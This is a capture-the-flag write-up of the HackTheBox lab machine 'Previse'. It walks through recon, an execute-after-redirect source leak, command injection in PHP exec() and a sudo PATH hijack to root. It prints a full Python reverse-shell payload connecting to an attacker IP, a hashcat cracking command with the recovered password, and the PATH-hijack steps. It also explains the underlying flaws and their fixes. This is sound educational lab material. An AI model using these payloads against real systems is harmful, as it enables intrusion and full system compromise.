Previse - HackTheBox

-


 Screenshot from 2022-01-03 23-01-27

This was a Easy Linux machine on HackTheBox. Let's Dive into it.

Name: Previse IP: 10.10.11.104

  • First step first, let's search for open portsusing rustscan rustscan -a 10.10.11.104 -u 5000.

    Only 2 ports open 80 & 22.

  • Nmap scan: nmap -A -p22,80 -T4 10.10.11.104

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • SSH is running on port 22 and Apache webserver on port 80 with PHP. Nothing seems much interesting from version number.

  • Let's enumerate directories on web server. Screenshot from 2022-01-03 23-08-57

  • Website have a login option but not register portal. And default creds. don't work. Checking source code,nothing there also. Everything else redirect to /login.php.

  • At this point nothing was vulnerable to me. Tried SQL injection on login page but no luck.

  • If you notice there is config.php file which was giving 200 response unlike others but had blank page in response. So i though of curling it to see response. curl http://10.10.11.104/config.php. But response was blank.

  • Then i remembered from one of the ctf i did from Tryhackme to see actual source code of page what's happening under the hood as page was always rickrolling after loading using js redirect. So i decided to curl accounts.php file due to it's big size. You could have noticed this using burp also , always use proxy LOL.

  • And voila it was vulnerable and leaked it's source code in response instead of being a "ONLY ADMINS SHOULD BE ABLE TO ACCESS THIS PAGE!!". Screenshot from 2022-01-03 23-33-05

  • Reading through it you can understand that you can create a new user by Sending a POST request. Use either burp or curl to do same, i did curl . curl -X POST http://10.10.11.104/accounts.php -d "username=notadmin&password=admin&confirm=admin"

  • Now you can loginn with notadmin:admin. And start poking around.

  • From /file.php you can download files. Let's look at siteBackup.zip. unzip it and you will get various files.

  • There are some mysql creds. in config.php file, which we can save for later.

Foothold: Command injection

  • Reading file_logs.php file these guys keep logs of our actions and provide an option to download it. They provide tan option to set delimeter in log files. How sweet of them. Reading through content of logs.php file you can spot the command injection vulnerability in Python exec() fucntion.

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");

user input delim is concatenated directly without sanitization. Bad Habit! :/

  • Reading about exec() it takes a string as input and treats them as an set of python commands. So we have to inject our own python reverse shell in it. Let's grab one from pentest monkey. Have your listener ready.

Payload : delim=;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.69",8081));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' . Ending initial string and then injecting python command.

Screenshot from 2022-01-04 00-03-34

Send it and you will catch your shell.

Lateral Movement: User Hash cracking

  • Let's list listening services. ss -lntp and mysql service is running let's login with creds. we got earlier.

    mysql -u root -p

    let's read accounts table.

    Screenshot from 2022-01-04 00-12-53

  • As we don't what this hashing method is with salt icon, it was help time from discord ;). Apparently hashcat can crack it but it takes some time.

hashcat -a 0 -m 500 hash ~/wordlist/rockyou.txt --force.

  1. -a is attack mode 0 loading file sfrom dictionary.
  2. -m 500 as hash starts with $1
  3. then hash file & wordlist path.

password: ilovecody112235!

  • Let's login as m4lwhere user su m4lwhere
  • Reading user flag. ed3baa8.................

Privilge escaltion: Path injection

  • User may run /opt/scripts/access_backup.sh file as root. sudo -l.
  • But that file has no write permission so we can't get root that way.
  • Let's read it's content.
!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

  • looks like it may be a path injection case, as date and gzip binaries are called without complete path.

  • Let's create a date file in /tmp directory. with content /bin/bash in it.

  • Make it executable chmod +x date.

  • Change PATH=/tmp:$PATH. Now when date binary will be called it will check first in /tmp directory and it will execute malicious one.

  • As m4lwhere user run the script with sudo you will get the root shell.

    Screenshot from 2022-01-04 01-04-39.

  • Now you are root and read root flag.

That was pretty much it. Let me know if there is any feedback maybe i am explaining too much.

=============================================

Edit: 

1. The vulnerability which is causing page source code leak in response even when it is a  302 Redirect is called EAR(Execute After Redirect) vulnerability. In which server check if user is logged in, if not then redirect the user but forgets to kill the processing of page like die(); or exit(); function.

if(checkloggedin()== False):

   header("location:/login.php");

  //die(); forgot to kill the page processing.

else:

    Execute.....

   

2. Why we could hijack binary PATH with sudo :

Simple reason was this that env variable was not protected.

 

 
 
My computer `sudo -l` output, preventing me from sudo PATH hijacking. Every time i will run sudo command it will run with minimal varibales preserving the sudo's secure PATH.


 

previse m4lwhere user `sudo -l` output there is no default entries, which mean  attacker can hijack PATH by passing his own env. variable to sudo.

More on this: 

https://newbedev.com/does-sudo-a-command-temporarily-change-path-to-be-the-root-s

https://www.tecmint.com/sudoers-configurations-for-setting-sudo-in-linux/

 

You can even test this locally :)


Thanks to ippsec for explaining these in his video.

================================================

Thank you.

Comments

Post a Comment

Popular posts from this blog

Epsilon - HackTheBox

-
Image
Epsilon Machine(10.10.11.134) Recon: Add epsilon.htb to hosts file. Runing Port Scan we get 3 open ports 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 | http-git: | 10.10.11.134:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: Updating Tracking API # Please enter the commit message for... |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: 403 Forbidden 5000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10) |_http-title: Costume Shop Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel Port 80 is apache & port 5000 is running python application i.e costume shop. As shown in scan port 80 is 403 Forbidden & have a .git directory that also is 403. Files like . git/config & .git/HEAD are accessible. We will use GitTools tool to dump this g...
Read more

Pandora - HackTheBox

-
Image
Pandora Machine(10.10.11.136) Info: This was an easy machine from HackTheBox, where i first time encountered SNMP. Then we had to exploit PandoraFMS, most interesting part of box, to get further control and PATH hijacking for privilege escaltion. Nothing too fancy still teaches a lot about manual testing. Recon: Starting with port scan, we get two open ports. $ nmap -T4 10.10.11.136 Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-18 21:11 IST Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 85.17% done; ETC: 21:11 (0:00:05 remaining) Nmap scan report for 10.10.11.136 Host is up (0.50s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http $ nmap -A -p22,80 -T4 10.10.11.136 Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-18 21:12 IST Nmap scan report for 10.10.11.136 Host is up (0.38s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (U...
Read more

Driver - HackTheBox

-
Image
  Driver Machine(10.10.11.106) This was an easy windows machine with a chance to explore printnightmare vulnerability and abusing file upload vulnerability to capture NTLM hash of a user whom we force to authenticate to our server. Recon on port scan we get 4 open ports 22/tcp filtered ssh 80/tcp open http Microsoft IIS httpd 10.0 | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=MFP Firmware Update Center. Please enter password for admin | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:window As...
Read more